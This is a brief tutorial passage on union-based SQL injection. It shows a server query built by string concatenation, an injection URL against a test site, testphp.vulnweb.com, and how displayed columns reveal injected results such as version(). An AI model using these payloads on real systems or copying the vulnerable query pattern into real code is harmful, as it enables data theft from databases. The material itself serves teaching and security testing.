Let’s say on your server-side code, you have this code:
sql = "select id, title, description from artists where id = " + id
So using this injection:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3
Would result in SQL statement as below:
select id, title, description from artists where id= -1 union select 1,2,3
If on the client-side (UI), “2” and “3” are displayed in the “title” and “description” fields, then we can say column 2 and column 3 of that table are vulnerable, which means if we put “version()” instead of 2 like below:
select id, title, description from artists where id= -1 union select 1,version(),3
then on the “title” field, instead of “2” we will receive the version value.
So basically, vulnerable columns are those that we have exposure of them on the client-side (UI) and we can see the result of injected code, for example in the above code, the version.